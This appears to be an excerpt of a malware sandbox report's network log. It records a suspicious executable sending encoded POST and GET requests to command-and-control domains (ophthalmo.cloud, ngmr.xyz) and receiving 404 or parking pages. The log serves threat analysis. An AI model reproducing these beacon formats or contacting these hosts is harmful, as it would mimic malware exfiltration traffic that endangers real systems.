                                          Data Ascii: DTs4CD4=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudQozXiLna5ABtxRR/oVK8HptLDDMMxsXtzRqwszLuxkzm5jwfKDXmkq/6fJ27jW/PDX0VsFYTJGXgAPl3j1pa95yUU1AQsCSni5ySPDS68j49rgx3u+aABpFs0oxpt8NJ2H2oiGiLoCDlCXC9EN1mzsWENY41krznipWfq70Iv9uPjJ55lh
                                          Dec 5, 2024 18:22:57.208271027 CET779INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:22:57 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Content-Encoding: gzip
                                          Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                          Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.849794217.160.0.207803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:22:58.593518972 CET1824OUTPOST /mgg3/ HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ophthalmo.cloud
                                          Connection: close
                                          Content-Length: 1244
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ophthalmo.cloud/mgg3/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 49 6f 77 68 65 4c 31 35 42 41 41 74 78 52 59 66 6f 57 4b 38 47 37 74 4c 62 66 4d 4e 4d 4f 58 75 48 52 6c 32 34 7a 4f 63 4a 6b 38 6d 35 6a 79 66 4b 43 50 47 6c 69 2f 36 50 4e 32 37 7a 57 2f 50 44 58 30 55 63 46 52 68 68 47 61 41 41 41 69 33 6a 79 69 36 39 52 79 51 34 44 41 51 70 31 56 58 43 35 38 57 6a 44 55 59 6b 6a 6c 4e 72 69 79 33 75 6d 61 41 4d 33 46 73 6f 4f 78 70 78 57 4e 4f 36 48 37 5a 48 61 77 50 77 2b 59 56 57 48 4d 71 55 54 2b 68 47 4d 66 79 64 57 6c 55 59 7a 2f 43 75 66 57 2b 50 7a 78 5a 36 51 34 5a 7a 6a 6f 65 4d 4d 6f 39 30 69 32 62 2f 42 35 6b 74 74 56 67 57 68 4b 38 46 71 36 35 66 74 6c 34 57 71 73 52 72 31 4f 33 35 4d 58 67 75 62 78 39 55 57 4c 57 75 67 34 6a 7a 48 62 2b 66 54 5a 47 4d 76 74 45 4a 59 4f 51 4c 77 75 62 69 50 6f 35 72 63 53 31 50 79 65 56 48 7a 44 75 4d 6c 55 4c 7a 66 4b 79 65 43 6b 2f 47 75 6e 75 49 76 7a 34 48 4a 46 57 [TRUNCATED]
                                          Data Ascii: DTs4CD4=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudIowheL15BAAtxRYfoWK8G7tLbfMNMOXuHRl24zOcJk8m5jyfKCPGli/6PN27zW/PDX0UcFRhhGaAAAi3jyi69RyQ4DAQp1VXC58WjDUYkjlNriy3umaAM3FsoOxpxWNO6H7ZHawPw+YVWHMqUT+hGMfydWlUYz/CufW+PzxZ6Q4ZzjoeMMo90i2b/B5kttVgWhK8Fq65ftl4WqsRr1O35MXgubx9UWLWug4jzHb+fTZGMvtEJYOQLwubiPo5rcS1PyeVHzDuMlULzfKyeCk/GunuIvz4HJFWbKVAjGsqirv9iQZkkUUBS19WnU1mBgQ8KCJf8GB20ER9CuK6Hj58l4GgL7y2Yp0myOHphMQdrMTbSGiGPMt0sJLwsox4qOHUitPhj26Ww6RxdqI3P5iYElxsAswBWq1bJxd29abqyPVoxiOoVXhlCCLrz/F+gLjWi9i4Z0tg0V6Qnc256ZWmSJK8AELwW8X4ATyZCorB/WnYExvGShQJ61jp6edWPOd0/pLI2qcXcQBFWJWyF4wxbxqY0Pr2IToZ+7YCEUJ4uBx6pcNIRqMKffA3YKHa4M8Sm2IDKceYSLpA8kF+qPuzePQmtj76FHOlVLcyIk2ULNGdoSg4+awIRwTscguc/5xzelkOlRhidMs+hJF7xR5UgxJ7zAenRhbaeNunZXdgk65rVCW1uT5Qb+teZ721GO5idqrKtZ3RU5vHUoqKQxx3NZAQzItxctbianvucJzg2wRKr/xElfFPmxBAkesGo2cClZNnQRqXFozH1GnGMtZSkg/6BheAcryJRu63XA4CV1F/x5hLCkiZ0DK6bv/48SH/iR90x6AhizPu4OOm4xxn9pUs9yG8OBIZa99WfGkILGX+s8oWSn41kUqY8scXsaZL+K0HDa4UEDSFPyHBP4T5gfoQqptGQgRQX1dOyZEKded70Z9Ah47VGTW3PURP5QFwGN [TRUNCATED]
                                          Dec 5, 2024 18:22:59.976537943 CET779INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:22:59 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Content-Encoding: gzip
                                          Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                          Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.849803217.160.0.207803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:23:01.386142969 CET516OUTGET /mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh8 HTTP/1.1
                                          Host: www.ophthalmo.cloud
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Dec 5, 2024 18:23:02.597970963 CET1236INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 1271
                                          Connection: close
                                          Date: Thu, 05 Dec 2024 17:23:02 GMT
                                          Server: Apache
                                          X-Frame-Options: deny
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                          Dec 5, 2024 18:23:02.598225117 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                          Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.84982154.67.87.110803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:23:08.634721994 CET766OUTPOST /qj8y/ HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ngmr.xyz
                                          Connection: close
                                          Content-Length: 208
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ngmr.xyz/qj8y/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 59 4a 45 52 33 58 44 44 64 71 51 35 43 51 2b 2b 68 4b 41 32 6b 6a 58 68 51 61 76 64 6a 49 6d 50 53 4f 2f 32 6f 4e 58 33 42 42 53 4b 77 74 72 6e 75 78 76 44 51 78 2b 37 4c 57 4a 6d 42 7a 34 30 57 2b 7a 6a 42 58 65 58 37 2b 37 61 31 76 64 52 6b 57 68 45 67 56 31 67 39 56 31 6c 4f 59 55 34 31 4c 34 6b 58 33 69 72 65 73 6e 73 2f 34 61 39 37 6a 42 5a 34 58 6e 4d 50 7a 65 70 79 70 6c 79 36 71 34 4f 33 43 6d 41 64 37 50 4e 6f 75 4b 45 46 4a 43 61 30 67 63 6a 65 32 56 4f 4f 61 69 56 6b 57 48 6e 33 4f 2f 38 72 52 62 57 54 47 63 2f 52 66 51 76 2f 5a 78 37 5a 71 79 47 47 50 58 74 32 55 6e 75 52 59 51 3d
                                          Data Ascii: DTs4CD4=YJER3XDDdqQ5CQ++hKA2kjXhQavdjImPSO/2oNX3BBSKwtrnuxvDQx+7LWJmBz40W+zjBXeX7+7a1vdRkWhEgV1g9V1lOYU41L4kX3iresns/4a97jBZ4XnMPzepyply6q4O3CmAd7PNouKEFJCa0gcje2VOOaiVkWHn3O/8rRbWTGc/RfQv/Zx7ZqyGGPXt2UnuRYQ=
                                          Dec 5, 2024 18:23:09.855412006 CET550INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:31 GMT
                                          X-Varnish: 1252442322
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.84982754.67.87.110803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:23:11.304506063 CET786OUTPOST /qj8y/ HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ngmr.xyz
                                          Connection: close
                                          Content-Length: 228
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ngmr.xyz/qj8y/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 32 4b 78 4a 6a 6e 76 31 37 44 64 52 2b 37 41 32 4a 6a 63 44 34 2f 57 2b 32 57 42 53 2b 58 37 2b 48 61 31 74 56 52 6e 6c 35 4c 67 46 31 75 78 31 31 6e 54 6f 55 34 31 4c 34 6b 58 7a 4f 52 65 6f 7a 73 2f 4c 53 39 37 43 42 65 77 33 6e 4e 49 7a 65 70 32 70 6c 2b 36 71 34 38 33 47 47 6d 64 35 33 4e 6f 75 61 45 4c 36 61 5a 36 67 63 6c 44 6d 56 52 4a 37 62 4e 74 6e 53 43 70 39 6d 5a 6d 52 54 7a 53 77 78 56 4c 39 59 70 38 5a 5a 51 5a 70 61 77 44 34 4b 46 73 33 33 65 50 50 45 7a 7a 6b 78 31 57 67 42 5a 75 43 66 70 64 6d 76 57 53 33 53 4c
                                          Data Ascii: DTs4CD4=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy2KxJjnv17DdR+7A2JjcD4/W+2WBS+X7+Ha1tVRnl5LgF1ux11nToU41L4kXzOReozs/LS97CBew3nNIzep2pl+6q483GGmd53NouaEL6aZ6gclDmVRJ7bNtnSCp9mZmRTzSwxVL9Yp8ZZQZpawD4KFs33ePPEzzkx1WgBZuCfpdmvWS3SL
                                          Dec 5, 2024 18:23:12.522968054 CET550INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:34 GMT
                                          X-Varnish: 1252442352
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.84983354.67.87.110803164C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 5, 2024 18:23:13.980938911 CET1803OUTPOST /qj8y/ HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ngmr.xyz
                                          Connection: close
                                          Content-Length: 1244
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ngmr.xyz/qj8y/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 2b 4b 77 37 37 6e 74 55 37 44 63 52 2b 37 4a 57 4a 69 63 44 34 2b 57 34 66 65 42 53 36 74 37 37 4c 61 30 4f 4e 52 69 55 35 4c 76 46 31 75 75 46 31 6d 4f 59 55 74 31 4c 49 6f 58 7a 2b 52 65 6f 7a 73 2f 4b 43 39 35 54 42 65 32 33 6e 4d 50 7a 65 74 79 70 6c 53 36 71 67 57 33 47 43 70 64 4e 44 4e 6f 50 71 45 47 6f 43 5a 79 67 63 6e 41 6d 55 45 4a 36 6e 73 74 6e 2f 39 70 2b 37 79 6d 53 7a 7a 65 57 77 4b 5a 39 59 6a 2b 62 64 2f 57 75 65 6c 64 4a 2f 70 68 57 4b 72 46 39 73 37 78 42 35 43 63 53 4a 34 76 7a 57 6b 4c 52 6e 6b 57 43 62 4c 67 48 34 38 59 68 6f 46 2b 53 41 38 37 79 30 31 35 50 31 56 56 50 4c 4f 61 71 73 48 51 73 47 53 6d 46 32 31 52 37 6e 74 67 46 41 79 65 46 6f 4c 49 73 70 4a 30 57 39 57 49 59 6f 70 47 4c 4c 69 55 61 71 73 31 38 6f 4b 34 66 42 52 74 78 57 4b 52 45 6a 42 39 35 48 50 72 53 38 54 55 67 48 68 51 54 44 41 76 52 59 53 37 6b 68 30 6b 31 [TRUNCATED]
                                          Data Ascii: DTs4CD4=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy+Kw77ntU7DcR+7JWJicD4+W4feBS6t77La0ONRiU5LvF1uuF1mOYUt1LIoXz+Reozs/KC95TBe23nMPzetyplS6qgW3GCpdNDNoPqEGoCZygcnAmUEJ6nstn/9p+7ymSzzeWwKZ9Yj+bd/WueldJ/phWKrF9s7xB5CcSJ4vzWkLRnkWCbLgH48YhoF+SA87y015P1VVPLOaqsHQsGSmF21R7ntgFAyeFoLIspJ0W9WIYopGLLiUaqs18oK4fBRtxWKREjB95HPrS8TUgHhQTDAvRYS7kh0k14AaicMlpgH3zkl4rq7AaxG3NX5j7emAizAtbtqW8ZNd6m06/Td2aJqxvZQrl8ytx7A/MTnCFKD7zQZMwq++mkXDc8ym0QLU4nDYriVklj63WhNcHuSCvnjo/k7tEQu4OwYYZNoShH/2QqBpErYXHwGZTE8iHxXbW13V+tPFu4oXNYb5TPDtZdYwmL348edVuT5v/RZDEHRjdeXS7TgVobuJf6RizUSYQ6OjlVdull8DwuzQ73L6if42yLnC/79Kv7eAZl0mjqduaiSmX+qNQ2QecaXJpGVCNGo5u4RHR31Veotqa1Ko9YdTjGFquOEDy2i2Z3FdeCAatf6IX8op6a9yIJw9KnZsNrlOEUm2Kj5+GLopRjCR4pTLbMzHTDSkKUhjW6ozxNFzZJrEWZJncd6WCyafprOAuZQ2TXHQosZKIZ16HefKkC1P2/+qHJsOGOUSP1KcLBPRVKxJak8K4TyWN0NStDkv76aLnTyqiOT5WbxQmzldvy2SISZkorrRgZeGI9jbslAdPujX2eVq6rVYcOf/ix5hPnxI0I7p+HKRxita0es1P6h06SL/yDz4em8s0b8jAnebponHEOmR3N+zE2azzYT+pSfg19PAGOkToXy3fUDAS2Ig4DQkrhZjovZ8YYYUqiXVMJUDLY83jwNB2wVW0nJo8q9 [TRUNCATED]
                                          Dec 5, 2024 18:23:15.254499912 CET550INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:36 GMT
                                          X-Varnish: 1252442382
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12192.168.2.84984254.67.87.11080
                                          TimestampBytes transferredDirectionData
